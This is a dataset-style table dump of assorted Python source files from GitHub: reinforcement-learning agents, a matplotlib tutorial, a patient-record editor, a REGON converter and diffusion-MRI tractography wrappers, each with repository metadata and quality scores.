max_stars_repo_path
stringlengths 4
197
| max_stars_repo_name
stringlengths 6
120
| max_stars_count
int64 0
191k
| id
stringlengths 1
8
| content
stringlengths 6
964k
| score
float64 -0.88
3.95
| int_score
int64 0
4
|
---|---|---|---|---|---|---|
malib/value_functions/__init__.py | wwxFromTju/malib | 6 | 38404 | <reponame>wwxFromTju/malib<gh_stars>1-10
from malib.value_functions.value_function import (
MLPValueFunction,
CommNetValueFunction,
BiCNetValueFunction,
)
# __all__ = ["MLPValueFunction"]
| 0.490234 | 0 |
scripts/run-and-rename.py | mfs6174/Deep6174 | 0 | 38532 | <filename>scripts/run-and-rename.py
#!/usr/bin/env python2
# -*- coding: UTF-8 -*-
# File: run-and-rename.py
# Date: Thu Sep 18 15:43:36 2014 -0700
# Author: <NAME> <<EMAIL>>
import numpy as np
from scipy.misc import imread, imsave
from itertools import izip
import sys, os
import shutil
import os.path
import glob
if len(sys.argv) != 3:
print "Usage: {0} <input directory with images> <model>".format(sys.argv[0])
sys.exit(0)
sys.path.insert(0, os.path.realpath(os.path.join(os.path.dirname(__file__), '../')))
from network_runner import NetworkRunner, get_nn
from lib.imageutil import get_image_matrix
from dataio import read_data
from lib.progress import Progressor
input_dir = sys.argv[1]
output_dir = os.path.join(input_dir, 'predicted')
shutil.rmtree(output_dir, ignore_errors=True)
os.mkdir(output_dir)
print "Reading images from {0}".format(input_dir)
print "Writing predicted results to {0}".format(output_dir)
model_file = sys.argv[2]
nn = get_nn(model_file)
print "Running network with model {0}".format(model_file)
# Run the network against a directory of images,
# and put predicted label in the filename
tot, corr = 0, 0
for f in glob.glob(input_dir + '/*'):
if not os.path.isfile(f):
continue
img = imread(f) / 255.0
pred = nn.predict(img)
label = f.split('-')[-1].split('.')[0]
new_fname = "{:04d}:{}-{},{}.png".format(tot, label, pred[0],
''.join(map(str, pred[1:])))
imsave(os.path.join(output_dir, new_fname), img)
tot += 1
corr += label == ''.join(map(str, pred[1:1+pred[0]]))
if tot > 0 and tot % 1000 == 0:
print "Progress:", tot
print corr, tot
| 1.65625 | 2 |
csvorm/relations.py | AppexX/python-csvorm | 2 | 38660 | class RelationType(object):
ONE_TO_MANY = "one_to_many"
ONE_TO_ONE = "one_to_one"
class Relation(object):
def __init__(self, cls):
self.cls = cls
class HasOne(Relation):
def get(self, id):
return self.cls.get(id=id)
class HasMany(Relation):
def get(self, id):
value = []
tokens = id.split(",")
for token in tokens:
value += (self.cls.get(id=token.strip()))
return value
| 2.359375 | 2 |
chapter09/idqn/ddqn_agent.py | roiyeho/drl-book | 0 | 38788 | <filename>chapter09/idqn/ddqn_agent.py<gh_stars>0
import numpy as np
import tensorflow as tf
from tensorflow import keras
from idqn.dqn_agent import DQNAgent
class DoubleDQNAgent(DQNAgent):
def __init__(self, env, config):
"""
:param env: the gym environment where the agent will run
:param config: a set of hyperparameters
"""
super().__init__(env, config)
def train(self, observations, actions, rewards, next_observations, dones):
# Use the online network to select the best actions for the next observations
next_q_values = self.q_network.predict(next_observations)
best_next_actions = np.argmax(next_q_values, axis=1)
# Use the target network to estimate the Q-values of these best actions
next_best_q_values = self.target_network.predict(next_observations)
next_best_q_values = next_best_q_values[np.arange(len(next_best_q_values)), best_next_actions]
target_q_values = rewards + (1 - dones) * self.config.gamma * next_best_q_values
with tf.GradientTape() as tape:
# Forward pass: compute the Q-values for the observations in the batch
all_q_values = self.q_network(observations)
# Mask out the Q-values for the non-chosen actions
mask = tf.one_hot(actions, self.n_actions)
q_values = tf.reduce_sum(all_q_values * mask, axis=1)
# Compute the loss between the targets and the Q-values
loss_fn = keras.losses.Huber()
loss = loss_fn(target_q_values, q_values)
# Perform a gradient descent step to minimize the loss with respect
# to the model's trainable variables
gradients = tape.gradient(loss, self.q_network.trainable_variables)
self.optimizer.apply_gradients(zip(gradients, self.q_network.trainable_variables)) | 2.53125 | 3 |
modificar_pacientes.py | Ratius9919/TP-programacion | 0 | 38916 | import os
def crear_dni(): #Se solicita un valor y tras las validaciones para verificar si es un dni, se lo devuelve.
valor = False
while valor == False:
try:
dni = input("[?] Por favor, ingrese su DNI: ")
if int(dni) > 1000000 and int(dni) < 200000000:
valor = True
except ValueError:
print("[!] Ingresaste un valor no valido.")
return dni
def escribir_archivo(lista):
with open("Pacientes.txt","a") as pacientes:
pacientes.write(f"{lista}\n")
def leer_archivo():
f = open ("Pacientes.txt", "r")
paciente = f.read()
f.close()
return paciente
def borrar_archivo():
with open("Pacientes.txt","a") as pacientes:
pacientes.truncate(0)
def lista():
pacientes = leer_archivo()
listar = pacientes.split("\n")
return listar
def buscar_dni(dni):
lista_pacientes = lista()
for i in range (len(lista_pacientes)):
paciente = lista_pacientes[i]
buscar = paciente.find(dni)
if buscar != -1:
return i
elif buscar == -1:
return buscar
def modificar_paciente(dni):
ubicacion = buscar_dni(dni)
if ubicacion == -1:
return -1
lista_pacientes = lista()
lista_paciente= lista_pacientes[ubicacion].split(";")
pregunta = int(input("[?] Que desea cambiar? [1] El DNI. [2] El nombre. [3] la edad. [0] Todos. [-1] Nada."))
if pregunta == 1:
lista_pacientes = lista_pacientes.pop(ubicacion)
lista_paciente[pregunta-1] = crear_dni()
if pregunta == 2:
lista_pacientes = lista_pacientes.pop(ubicacion)
nombre = input("[?] Ingrese su nombre por favor: ")
while nombre.isdigit():
nombre = input("[?] Ingrese su nombre por favor, solo letras: ")
lista_paciente[pregunta-1] = nombre
if pregunta == 3:
lista_pacientes = lista_pacientes.pop(ubicacion)
edad = input("[?] Edad: ")
while edad.isdigit() == False:
edad = input("[?] Ingrese su edad nuevamente. Solo numeros: ")
while int(edad) <= 17:
print("[!] Error, no se le puede inscribir si es menor de 17.")
edad = input("[?] Ingrese su edad nuevamente: ")
lista_paciente[pregunta-1] = edad
if pregunta == 0:
lista_pacientes = lista_pacientes.pop(ubicacion)
lista_paciente[0] = crear_dni()
nombre = input("[?] Ingrese su nombre por favor: ")
while nombre.isdigit():
nombre = input("[?] Ingrese su nombre por favor, solo letras: ")
lista_paciente[1] = nombre
edad = input("[?] Edad: ")
while edad.isdigit() == False:
edad = input("[?] Ingrese su edad nuevamente. Solo numeros: ")
while int(edad) <= 17:
print("[!] Error, no se le puede inscribir si es menor de 17.")
edad = input("[?] Ingrese su edad nuevamente: ")
lista_paciente[2] = edad
return lista_paciente
def modificar_lista(dni):
valor = modificar_paciente(dni)
if valor == -1:
print("[!] No se ha encontrado el DNI, volviendo a la pantalla anterior.")
return
lista_original = lista()
ubicacion = buscar_dni(dni)
lista_original.pop(ubicacion)
lista_original.insert(ubicacion,valor)
lista_str = str(lista_original)
lista_str.replace("["," ")
lista_str.replace("]"," ")
lista_str.replace("'"," ")
return lista_original
def main(dni):
valor = buscar_dni(dni)
if valor == -1:
return
lista = modificar_lista(dni)
borrar_archivo()
escribir_archivo(lista)
dni = input("¿Cual es el DNI que desea modificar?")
main(dni) | 2.46875 | 2 |
fastapi/signals/__init__.py | zhangnian/fastapi | 33 | 39044 | <reponame>zhangnian/fastapi
from blinker import signal
from fastapi.signals.signal_handler import *
sig_user = signal('userinfo_modifiy')
def register_signal_handlers():
sig_user.connect(on_userinfo_modify) | 0.882813 | 1 |
codeMania-python-matplotlib/tut8.py | JayramMardi/codeMania | 0 | 39172 | # chapter Matplotlib Plotting
'''
The plot() function is used to draw points (markers) in a diagram.
By default, the plot() function draws a line from point to point.
The function takes parameters for specifying points in the diagram.
Parameter 1 is an array containing the points on the x-axis.
Parameter 2 is an array containing the points on the y-axis.
If we need to plot a line from (1, 3) to (8, 10), we have to pass two arrays [1, 8] and [3, 10] to the plot function.
'''
# Draw a line in a diagram from position (1, 3) to position (8, 10):
import matplotlib.pyplot as plt
import numpy as r
import sys
x=r.array([1,9,])
y=r.array([4,10])
plt.plot(x,y)
plt.show()
'''
Plotting Without Line
To plot only the markers, you can use shortcut string notation parameter 'o', which means 'rings'.
'''
x=r.array([3,10])
y=r.array([0,34])
plt.plot(x,y,'o')
plt.show()
'''
Multiple Points
You can plot as many points as you like, just make sure you have the same number of points in both axis.
Example
Draw a line in a diagram from position (1, 3) to (2, 8) then to (6, 1) and finally to position (8, 10):f
'''
x=r.array([1,2,4,9])
y=r.array([3,6,8,10])
plt.plot(x,y,label="red")
plt.show()
#Two lines to make our compiler able to draw:
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
'''
Default X-Points
If we do not specify the points in the x-axis, they will get the default values 0, 1, 2, 3, (etc. depending on the length of the y-points.
So, if we take the same example as above, and leave out the x-points, the diagram will look like this:
'''
# Plotting without x-points:
ypoints=r.array([0,2,3,5,6,7,99])
plt.plot(ypoints)
plt.show()
plt.savefig(sys.stdout.buffer)
sys.stdout.flush()
# CHAPTER Matplotlib Markers
'''
Markers
You can use the keyword argument marker to emphasize each point with a specified marker:
'''
x=r.array([0,3,5,6,8,9])
y=r.array([2,4,6,7,8,10])
plt.plot(x,y,marker="*")
plt.show()
'''
Marker Reference
You can choose any of these markers:
Marker Description
'o' Circle
'*' Star
'.' Point
',' Pixel
'x' X
'X' X (filled)
'+' Plus
'P' Plus (filled)
's' Square
'D' Diamond
'd' Diamond (thin)
'p' Pentagon
'H' Hexagon
'h' Hexagon
'v' Triangle Down
'^' Triangle Up
'<' Triangle Left
'>' Triangle Right
'1' Tri Down
'2' Tri Up
'3' Tri Left
'4' Tri Right
'|' Vline
'_' Hline
'''
'''
Format Strings fmt
You can use also use the shortcut string notation parameter to specify the marker.
This parameter is also called fmt, and is written with this syntax:
marker|line|color
Example
Mark each point with a circle:
'''
x=r.array([3,5,5,6,7,8])
y=r.array([1,3,5,6,7,8])
plt.plot(x,y,'-.r')
plt.show()
'''
The marker value can be anything from the Marker Reference above.
The line value can be one of the following:
Line Reference
Line Syntax Description
'-' Solid line
':' Dotted line
'--' Dashed line
'-.' Dashed/dotted line
Note: If you leave out the line value in the fmt parameter, no line will be plottet.
'''
'''
Color Reference
Color Syntax Description
'r' Red
'g' Green
'b' Blue
'c' Cyan
'm' Magenta
'y' Yellow
'k' Black
'w' White
'''
'''
Marker Size
You can use the keyword argument markersize or the shorter version, ms to set the size of the markers:
'''
x=r.array([1,3,4,5,9,5])
y=r.array([0,3,6,8,8])
plt.plot(x,marker='o',ms='17')
plt.show()
'''
Marker Color
You can use the keyword argument markeredgecolor or the shorter mec to set the color of the edge of the markers:
Example
Set the EDGE color to red:
'''
x=r.array([2,3,5,6])
y=r.array('[0,3,5,6,8]')
plt.plot(x,marker='*',ms=34,mec='r')
plt.show()
'''
You can use the keyword argument markerfacecolor or the shorter mfc to set the color inside the edge of the markers:
Example
Set the FACE color to red:
'''
x=r.array([1,3,5,6])
y=r.array([2,3,5,6])
plt.plot(x,marker='*',ms=34,mfc='r')
plt.show()
'''
# Use both the mec and mfc arguments to color of the entire marker:
# Example
# Set the color of both the edge and the face to red:
'''
import matplotlib.pyplot as plt
import numpy as r
y=r.array([0,4,6,7,7,8])
plt.plot(y,marker='*',ms=30,mec='r',mfc='r')
plt.show()
'''
You can also use Hexadecimal color values:
Example
Mark each point with a beautiful green color:
...
plt.plot(ypoints, marker = 'o', ms = 20, mec = '#4CAF50', mfc = '#4CAF50')
...
'''
import matplotlib.pyplot as plt
import numpy as np
x=np.array([1,2,3,4,5,6,5,7])
y=np.array([1,2,4,5,5,6,])
plt.plot(y,ms=34,marker='*',mec='hotpink',mfc="hotpink",linestyle=':')
plt.show()
| 3.484375 | 3 |
examples/example_ME5ME6.py | bmachiel/python-substratestack | 1 | 39300 | #!/bin/env python
# import the technology's complete stack definition
from example import stack
# in order to decrease simulation times, some metal layers can be removed from
# the stack, allowing more oxide layers to be merged in the next step
stack.remove_metal_layer_by_name('PO1')
stack.remove_metal_layer_by_name('ME1')
stack.remove_metal_layer_by_name('ME2')
stack.remove_metal_layer_by_name('ME3')
stack.remove_metal_layer_by_name('ME4')
#stack.remove_metal_layer_by_name('ME5')
#stack.remove_metal_layer_by_name('ME6')
if __name__ == '__main__':
# Print the standardized stack to example_ME5ME6_std.pdf
stack.draw('example_ME5ME6_std', pages=3, single_page=True)
# Merge oxide layers to reduce the stack's complexity, decreasing simulation
# times
stack.simplify()
if __name__ == '__main__':
# Print the simplified stack to example_ME5ME6.pdf
stack.draw('example_ME5ME6', pages=3, single_page=True)
# Write out a Momentum subtrate definition file of the simplified stack
# write_momentum_substrate argument: filename (without extension),
# infinite ground plane
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_momentum_substrate('example_ME5ME6', True)
# Write out a Sonnet project that includes the simplified subtrate stack
# write_sonnet_technology argument: filename (without extension)
# NOTE: this might produce bad output when the stack has not been
# simplified before!
stack.write_sonnet_technology('example_ME5ME6')
| 2.28125 | 2 |
ex105.py | erikamaylim/Python-CursoemVideo | 0 | 39428 | <reponame>erikamaylim/Python-CursoemVideo
"""Faça um programa que tenha uma função notas() que pode receber várias notas de alunos
e vai retornar um dicionário com as seguintes informações:
– Quantidade de notas
- A maior nota
– A menor nota
– A média da turma
– A situação (opcional)"""
def notas(* num, s=False):
"""
-> Função para coletar notas dos alunos e retornar informações gerais e a situação da turma.
:param num: Notas da turma
:param s: Situação (Boa, Razoável ou Ruim)
:return: dicionário com informações sobre a turma
"""
soma = sum(num)
qtd = len(num)
maior = max(num)
menor = min(num)
media = soma / qtd
if media >= 6:
sit = 'Boa'
elif media >= 5:
sit = 'Razoável'
else:
sit = 'Ruim'
total = {'Quantidade de notas': qtd, 'Maior nota': maior, 'Menor nota': menor, 'Média': media}
if s:
total['Situação'] = sit
return total
print(notas(2, 3, 5, 4, 1, 3, s=True))
print(notas(10, 7, 8, 10, s=True))
print(notas(4, 6, 7, 5, 6.5, 7, 5))
help(notas)
| 2.953125 | 3 |
Pluto/Systems/__init__.py | n8vm/Foton | 10 | 39556 | <gh_stars>1-10
from Pluto.Systems.Systems import *
| 0.186523 | 0 |
RegonAPI/converters.py | damianwasik98/RegonAPI | 10 | 39684 | <reponame>damianwasik98/RegonAPI
"""
Converters of codes
"""
from string import digits
from .exceptions import RegonConvertionError
from . import validators
REGON9_WEIGHTS = [8, 9, 2, 3, 4, 5, 6, 7]
REGON14_WEIGHTS = [2, 4, 8, 5, 0, 9, 7, 3, 6, 1, 2, 4, 8]
def regon8_to_9(regon8):
"""Convert REGON8 to REGON9
Parameters
----------
regon8 : str
REGON8
Returns
-------
str
REGON9
Raises
------
RegonConvertionError
If regon8 is not valid
"""
if not validators.is_valid_regon8(regon8):
raise RegonConvertionError(regon8)
a, b = list(regon8), REGON9_WEIGHTS
a = list(map(lambda x: int(x), a))
last_digit = sum(list(map(lambda x: x[0] * x[1], zip(a, b)))) % 11
regon9 = "{regon8}{last_digit}".format(regon8=regon8, last_digit=last_digit)
return regon9
def regon13_to_14(regon13):
"""Convert REGON13 to REGON14
Parameters
----------
regon13 : str
REGON13
Returns
-------
str
REGON14
Raises
------
RegonConvertionError
If regon13 is not valid
"""
if not validators.is_valid_regon13(regon13):
raise RegonConvertionError(regon13)
a, b = list(regon13), REGON14_WEIGHTS
a = list(map(lambda x: int(x), a))
last_digit = sum(list(map(lambda x: x[0] * x[1], zip(a, b)))) % 11
regon14 = "{regon13}{last_digit}".format(regon13=regon13, last_digit=last_digit)
return regon14
| 2.703125 | 3 |
examples/fiber_tractography/TractographyHelper.py | MIC-DKFZ/cmdint | 8 | 39812 | <gh_stars>1-10
from cmdint import CmdInterface
import numpy as np
from shutil import copyfile
from dipy.io import read_bvals_bvecs
import os
""" This exapmple contains two classes that help with fiber tractography using MITK Diffusion and MRtrix. It is only
intended as a larger example of multiple usages of CmdInterface and NOT (yet) as a polished class that wraps
command line tools for fiber tractography and diffusion signal modelling.
"""
def flip_bvecs(input_dwi: str, output_dwi: str):
bvals, bvecs = read_bvals_bvecs(input_dwi.replace('.nii.gz', '.bvals'), input_dwi.replace('.nii.gz', '.bvecs'))
bvecs[:, 0] *= -1
np.savetxt(output_dwi.replace('.nii.gz', '.bvecs'), np.transpose(bvecs), fmt='%10.6f')
copyfile(input_dwi, output_dwi)
copyfile(input_dwi.replace('.nii.gz', '.bvals'), output_dwi.replace('.nii.gz', '.bvals'))
class MitkTrackingHelper:
def __init__(self):
pass
@staticmethod
def recon_qball(input_dwi, out_folder, sh_order: int, do_flip_bvecs: bool):
""" Perform analytical q-ball reconstruction with solid angle consideration and output the resulting
spherical harmonics ODFs.
"""
os.makedirs(out_folder, exist_ok=True)
if do_flip_bvecs:
flipper = CmdInterface(flip_bvecs)
flipper.add_arg('input_dwi', input_dwi, check_input=True)
input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder)
input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz')
flipper.add_arg('output_dwi', input_dwi, check_output=True)
flipper.run()
qball_recon = CmdInterface('MitkQballReconstruction')
qball_recon.add_arg(key='-i', arg=input_dwi, check_input=True)
qball_recon.add_arg(key='-o', arg=out_folder + 'odf_qball_mitk.nii.gz', check_output=True)
qball_recon.add_arg(key='--sh_order', arg=sh_order)
qball_recon.run()
return out_folder + 'odf_qball_mitk.nii.gz'
@staticmethod
def recon_tensor(input_dwi: str, out_folder: str, do_flip_bvecs: bool = False):
""" Perform diffusion tesnor modelling of the signal.
"""
os.makedirs(out_folder, exist_ok=True)
if do_flip_bvecs:
flipper = CmdInterface(flip_bvecs)
flipper.add_arg('input_dwi', input_dwi, check_input=True)
input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder)
input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz')
flipper.add_arg('output_dwi', input_dwi, check_output=True)
flipper.run()
tensor_recon = CmdInterface('MitkTensorReconstruction')
tensor_recon.add_arg(key='-i', arg=input_dwi, check_input=True)
tensor_recon.add_arg(key='-o', arg=out_folder + 'tensors_mitk.dti', check_output=True)
tensor_recon.run()
return out_folder + 'tensors_mitk.dti'
@staticmethod
def train_rf(i: str,
t: str,
out_folder: str,
masks: str = None,
wm_masks: str = None,
volume_modification_images: str = None,
additional_feature_images: str = None,
num_trees: int = 30,
max_tree_depth: int = 25,
sample_fraction: float = 0.7,
use_sh_features: bool = 0,
sampling_distance: float = None,
max_wm_samples: int = None,
num_gm_samples: int = None):
"""
Train a random forest for machine learning based tractography.
i: input diffusion-weighted images
t: input training tractograms
o: output random forest (HDF5)
masks: restrict training using a binary mask image (optional)
wm_masks: if no binary white matter mask is specified
volume_modification_images: specify a list of float images that modify the fiber density (optional)
additional_feature_images: specify a list of float images that hold additional features (float) (optional)
num_trees: number of trees (optional)
max_tree_depth: maximum tree depth (optional)
sample_fraction: fraction of samples used per tree (optional)
use_sh_features: use SH features (optional)
sampling_distance: resampling parameter for the input tractogram in mm (determines number of white-matter samples) (optional)
max_wm_samples: upper limit for the number of WM samples (optional)
num_gm_samples: Number of gray matter samples per voxel (optional)
"""
runner = CmdInterface('MitkRfTraining')
runner.add_arg(key='-i', arg=i, check_input=True)
runner.add_arg(key='-t', arg=t, check_input=True)
runner.add_arg(key='-o', arg=out_folder + 'forest_mitk.rf', check_output=True)
if masks is not None:
runner.add_arg(key='--masks', arg=masks)
if wm_masks is not None:
runner.add_arg(key='--wm_masks', arg=wm_masks)
if volume_modification_images is not None:
runner.add_arg(key='--volume_modification_images', arg=volume_modification_images)
if additional_feature_images is not None:
runner.add_arg(key='--additional_feature_images', arg=additional_feature_images)
if num_trees is not None:
runner.add_arg(key='--num_trees', arg=num_trees)
if max_tree_depth is not None:
runner.add_arg(key='--max_tree_depth', arg=max_tree_depth)
if sample_fraction is not None:
runner.add_arg(key='--sample_fraction', arg=sample_fraction)
if use_sh_features is not None:
runner.add_arg(key='--use_sh_features', arg=use_sh_features)
if sampling_distance is not None:
runner.add_arg(key='--sampling_distance', arg=sampling_distance)
if max_wm_samples is not None:
runner.add_arg(key='--max_wm_samples', arg=max_wm_samples)
if num_gm_samples is not None:
runner.add_arg(key='--num_gm_samples', arg=num_gm_samples)
runner.run()
return out_folder + 'forest_mitk.rf'
@staticmethod
def track_streamline(i: str,
out_folder: str,
algorithm: str,
flip_x: bool = False,
flip_y: bool = False,
flip_z: bool = False,
no_data_interpolation: bool = False,
no_mask_interpolation: bool = False,
compress: float = None,
seeds: int = 1,
seed_image: str = None,
trials_per_seed: int = 10,
max_tracts: int = -1,
tracking_mask: str = None,
stop_image: str = None,
exclusion_image: str = None,
ep_constraint: str = None,
target_image: str = None,
sharpen_odfs: bool = False,
cutoff: float = 0.1,
odf_cutoff: float = 0,
step_size: float = 0.5,
min_tract_length: float = 20,
angular_threshold: float = None,
loop_check: float = None,
prior_image: str = None,
prior_weight: float = 0.5,
restrict_to_prior: bool = False,
new_directions_from_prior: bool = False,
num_samples: int = 0,
sampling_distance: float = 0.25,
use_stop_votes: bool = False,
use_only_forward_samples: bool = False,
tend_f: float = 1,
tend_g: float = 0,
forest: str = None,
use_sh_features: bool = False,
additional_images: str = None):
"""
Perform MITK streamline tractography.
i: input image (multiple possible for 'DetTensor' algorithm)
out_folder: output folder
algorithm: which algorithm to use (Peaks
flip_x: multiply x-coordinate of direction proposal by -1 (optional)
flip_y: multiply y-coordinate of direction proposal by -1 (optional)
flip_z: multiply z-coordinate of direction proposal by -1 (optional)
no_data_interpolation: don't interpolate input image values (optional)
no_mask_interpolation: don't interpolate mask image values (optional)
compress: compress output fibers using the given error threshold (in mm) (optional)
seeds: number of seed points per voxel (optional)
seed_image: mask image defining seed voxels (optional)
trials_per_seed: try each seed N times until a valid streamline is obtained (only for probabilistic tractography) (optional)
max_tracts: tractography is stopped if the reconstructed number of tracts is exceeded (optional)
tracking_mask: streamlines leaving the mask will stop immediately (optional)
stop_image: streamlines entering the mask will stop immediately (optional)
exclusion_image: streamlines entering the mask will be discarded (optional)
ep_constraint: determines which fibers are accepted based on their endpoint location - options are NONE
target_image: effact depends on the chosen endpoint constraint (option ep_constraint) (optional)
sharpen_odfs: if you are using dODF images as input
cutoff: set the FA
odf_cutoff: threshold on the ODF magnitude. this is useful in case of CSD fODF tractography. (optional)
step_size: step size (in voxels) (optional)
min_tract_length: minimum fiber length (in mm) (optional)
angular_threshold: angular threshold between two successive steps
loop_check: threshold on angular stdev over the last 4 voxel lengths (optional)
prior_image: tractography prior in thr for of a peak image (optional)
prior_weight: weighting factor between prior and data. (optional)
restrict_to_prior: restrict tractography to regions where the prior is valid. (optional)
new_directions_from_prior: the prior can create directions where there are none in the data. (optional)
num_samples: number of neighborhood samples that are use to determine the next progression direction (optional)
sampling_distance: distance of neighborhood sampling points (in voxels) (optional)
use_stop_votes: use stop votes (optional)
use_only_forward_samples: use only forward samples (optional)
tend_f: weighting factor between first eigenvector (f=1 equals FACT tracking) and input vector dependent direction (f=0). (optional)
tend_g: weighting factor between input vector (g=0) and tensor deflection (g=1 equals TEND tracking) (optional)
forest: input random forest (HDF5 file) (optional)
use_sh_features: use SH features (optional)
additional_images: specify a list of float images that hold additional information (FA
"""
os.makedirs(out_folder, exist_ok=True)
tracts = out_folder + os.path.basename(i).split('.')[0] + '_' + algorithm + '_mitk.trk'
runner = CmdInterface('MitkStreamlineTractography')
runner.add_arg(key='-i', arg=i, check_input=True)
runner.add_arg(key='-o', arg=tracts, check_output=True)
runner.add_arg(key='--algorithm', arg=algorithm)
if flip_x:
runner.add_arg(key='--flip_x')
if flip_y:
runner.add_arg(key='--flip_y')
if flip_z:
runner.add_arg(key='--flip_z')
if no_data_interpolation:
runner.add_arg(key='--no_data_interpolation')
if no_mask_interpolation:
runner.add_arg(key='--no_mask_interpolation')
if compress is not None:
runner.add_arg(key='--compress', arg=compress)
if seeds is not None:
runner.add_arg(key='--seeds', arg=seeds)
if seed_image is not None:
runner.add_arg(key='--seed_image', arg=seed_image)
if trials_per_seed is not None:
runner.add_arg(key='--trials_per_seed', arg=trials_per_seed)
if max_tracts is not None:
runner.add_arg(key='--max_tracts', arg=max_tracts)
if tracking_mask is not None:
runner.add_arg(key='--tracking_mask', arg=tracking_mask)
if stop_image is not None:
runner.add_arg(key='--stop_image', arg=stop_image)
if exclusion_image is not None:
runner.add_arg(key='--exclusion_image', arg=exclusion_image)
if ep_constraint is not None:
runner.add_arg(key='--ep_constraint', arg=ep_constraint)
if target_image is not None:
runner.add_arg(key='--target_image', arg=target_image)
if sharpen_odfs:
runner.add_arg(key='--sharpen_odfs')
if cutoff is not None:
runner.add_arg(key='--cutoff', arg=cutoff)
if odf_cutoff is not None:
runner.add_arg(key='--odf_cutoff', arg=odf_cutoff)
if step_size is not None:
runner.add_arg(key='--step_size', arg=step_size)
if min_tract_length is not None:
runner.add_arg(key='--min_tract_length', arg=min_tract_length)
if angular_threshold is not None:
runner.add_arg(key='--angular_threshold', arg=angular_threshold)
if loop_check is not None:
runner.add_arg(key='--loop_check', arg=loop_check)
if prior_image is not None:
runner.add_arg(key='--prior_image', arg=prior_image)
if prior_weight is not None:
runner.add_arg(key='--prior_weight', arg=prior_weight)
if restrict_to_prior:
runner.add_arg(key='--restrict_to_prior')
if new_directions_from_prior:
runner.add_arg(key='--new_directions_from_prior')
if num_samples is not None:
runner.add_arg(key='--num_samples', arg=num_samples)
if sampling_distance is not None:
runner.add_arg(key='--sampling_distance', arg=sampling_distance)
if use_stop_votes:
runner.add_arg(key='--use_stop_votes')
if use_only_forward_samples:
runner.add_arg(key='--use_only_forward_samples')
if tend_f is not None:
runner.add_arg(key='--tend_f', arg=tend_f)
if tend_g is not None:
runner.add_arg(key='--tend_g', arg=tend_g)
if forest is not None:
runner.add_arg(key='--forest', arg=forest)
if use_sh_features:
runner.add_arg(key='--use_sh_features')
if additional_images is not None:
runner.add_arg(key='--additional_images', arg=additional_images)
runner.run()
return tracts
@staticmethod
def mitkglobaltractography(i: str,
out_folder: str,
parameters: str,
mask: str = None):
"""
Perform MITK global tractography. Save a paramter file for usage using the MITK Diffusion GUI application.
http://mitk.org/wiki/MitkDiffusion
i: input image (tensor
out_folder: output folder
parameters: parameter file (.gtp)
mask: binary mask image (optional)
"""
os.makedirs(out_folder, exist_ok=True)
tracts = out_folder + os.path.basename(i).split('.')[0] + '_Global_mitk.trk'
runner = CmdInterface('MitkGlobalTractography')
runner.add_arg(key='-i', arg=i, check_input=True)
runner.add_arg(key='-o', arg=tracts, check_output=True)
runner.add_arg(key='--parameters', arg=parameters)
if mask is not None:
runner.add_arg(key='--mask', arg=mask, check_input=True)
runner.run()
return tracts
class MRtrixTrackingHelper:
@staticmethod
def recon_csd(input_dwi: str, do_flip_bvecs: bool, out_folder: str, algo: str = 'tournier'):
""" Perform constrained spherical deconvolution modelling and output the resulting spherical harmonics fODFs.
"""
os.makedirs(out_folder, exist_ok=True)
if do_flip_bvecs:
flipper = CmdInterface(flip_bvecs)
flipper.add_arg('input_dwi', input_dwi, check_input=True)
input_dwi = input_dwi.replace(os.path.dirname(input_dwi), out_folder)
input_dwi = input_dwi.replace('.nii.gz', '_flipped.nii.gz')
flipper.add_arg('output_dwi', input_dwi, check_output=True)
flipper.run()
csd_algo = 'csd'
num_responses = 1
if algo != 'tournier':
num_responses = 3
csd_algo = 'msmt_csd'
dwi2response = CmdInterface('dwi2response')
dwi2response.add_arg(arg=algo)
dwi2response.add_arg(arg=input_dwi, check_input=True)
for i in range(num_responses):
dwi2response.add_arg(arg=out_folder + 'response_' + algo + '_' + str(i) + '_mrtrix.txt', check_output=True)
dwi2response.add_arg(key='-force')
dwi2response.add_arg('-nthreads', 12)
dwi2response.add_arg(key='-fslgrad',
arg=[input_dwi.replace('.nii.gz', '.bvecs'), input_dwi.replace('.nii.gz', '.bvals')],
check_input=True)
dwi2response.run()
dwi2fod = CmdInterface('dwi2fod')
dwi2fod.add_arg(arg=csd_algo)
dwi2fod.add_arg(arg=input_dwi, check_input=True)
for i in range(num_responses):
dwi2fod.add_arg(arg=out_folder + 'response_' + algo + '_' + str(i) + '_mrtrix.txt', check_input=True)
dwi2fod.add_arg(arg=out_folder + 'odf_' + csd_algo + '_' + str(i) + '_mrtrix.nii.gz', check_output=True)
dwi2fod.add_arg(key='-force')
dwi2fod.add_arg('-nthreads', 12)
dwi2fod.add_arg(key='-fslgrad',
arg=[input_dwi.replace('.nii.gz', '.bvecs'), input_dwi.replace('.nii.gz', '.bvals')],
check_input=True)
dwi2fod.run(version_arg='--version')
return out_folder + 'odf_' + csd_algo + '_' + str(0) + '_mrtrix.nii.gz'
sh2peaks = CmdInterface('sh2peaks')
sh2peaks.add_arg(arg=out_folder + 'odf_' + csd_algo + '_0_mrtrix.nii.gz', check_input=True)
sh2peaks.add_arg(arg=out_folder + 'peaks_' + csd_algo + '_0_mrtrix.nii.gz', check_output=True)
sh2peaks.add_arg('-threshold', 0.1)
sh2peaks.run(version_arg='--version')
flipper = CmdInterface('MitkFlipPeaks')
flipper.add_arg('-i', out_folder + 'peaks_' + csd_algo + '_0_mrtrix.nii.gz', check_input=True)
flipper.add_arg('-o', out_folder + 'peaks_' + csd_algo + '_0_flipped_mrtrix.nii.gz', check_output=True)
flipper.add_arg('-z')
flipper.run()
@staticmethod
def track_streamline(input_image: str,
out_folder: str,
algo: str,
num_streamlines: int,
cutoff: float = 0.1,
minlength: int = 30,
maxlength: int = 200,
step: float = None,
angle: float = None):
""" Perform MRtrix streamline tractography.
"""
os.makedirs(out_folder, exist_ok=True)
tracts = out_folder + os.path.basename(input_image).split('.')[0] + '_' + algo + '_mrtrix'
tckgen = CmdInterface('tckgen')
tckgen.add_arg(arg=input_image, check_input=True)
if algo == 'Tensor_Det' or algo == 'Tensor_Prob':
print(algo + ' NOT IMPLEMENTED')
exit()
tckgen.add_arg(key='-fslgrad',
arg=[input_image.replace('.nii.gz', '.bvecs'), input_image.replace('.nii.gz', '.bvals')])
tckgen.add_arg(arg=tracts + '.tck', check_output=True)
tckgen.add_arg('-algorithm', algo)
